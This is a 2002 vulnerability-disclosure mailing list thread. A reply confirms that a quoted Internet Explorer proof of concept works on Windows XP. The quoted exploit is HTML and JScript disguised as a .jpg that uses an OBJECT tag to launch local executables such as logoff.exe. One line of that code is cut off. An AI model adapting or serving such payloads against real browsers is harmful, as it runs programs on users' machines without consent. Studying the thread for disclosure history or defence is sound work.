Re: Rather large MSIE-hole

["Jon Zobrist" <kgb () ussr com>]

I copied the included text, pasted it into bad.jpg on my apache box, called
the page from my IE and got the message
You should feel lucky if you dont have XP right now.

I'm running Windows XP Pro, IE Version 6.0.2600.0000.xpclient.010817-1148

Installed patches/hotfixes:
Windows XP Application Compatibality Update[Q313484]
Windows XP Hotfixes for Q307869, Q308210, Q309521, Q309691, Q310437,
Q311889, Q314147, Q3150000

-Jon Zobrist, CISSP

----- Original Message -----
From: "Magnus Bodin" <magnus () bodin org>
To: <vuln-dev () securityfocus com>
Sent: Tuesday, March 12, 2002 3:32 AM
Subject: Rather large MSIE-hole


> The latest MSIE-hole is now spreading.
>
> THE ATTACHED HTML-code is served as a jpeg-file, and as MSIE ignores the
> Content-Type if it "thinks" it knows better, then the code is executed.
> This in combination with the malicious code that is possible to run, then
> an "innocent.jpg" with the following content will log off an XP-user.
>
> --%< cut here-----
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
> <HTML>
> <HEAD>
> <TITLE>IE6 security...</TITLE>
>
> <META http-equiv=Content-Type content="text/html; charset=windows-1252">
> <SCRIPT language=JScript>
>
> var programName=new Array(
>     'c:/windows/system32/logoff.exe',
>     'c:/winxp/system32/logoff.exe',
>     'c:/winnt/system32/logoff.exe'
> );
>
> function Init(){
>     var oPopup=window.createPopup();
>     var oPopBody=oPopup.document.body;
>     var n,html='';
>     for(n=0;n<programName.length;n++)
>         html+="<OBJECT NAME='X'
> CLASSID='CLSID:11111111-1111-1111-1111-111111111111' C
>     oPopBody.innerHTML=html;
>     oPopup.show(290, 390, 200, 200, document.body);
> }
>
> </SCRIPT>
> </head>
> <BODY onload="Init()">
> You should feel lucky if you dont have XP right now.
> </BODY>
> </HTML>
> --%< cut here-----
>
>
> --
> magnus                               MICROS~1 BOB was written in Lisp.
>             http://x42.com/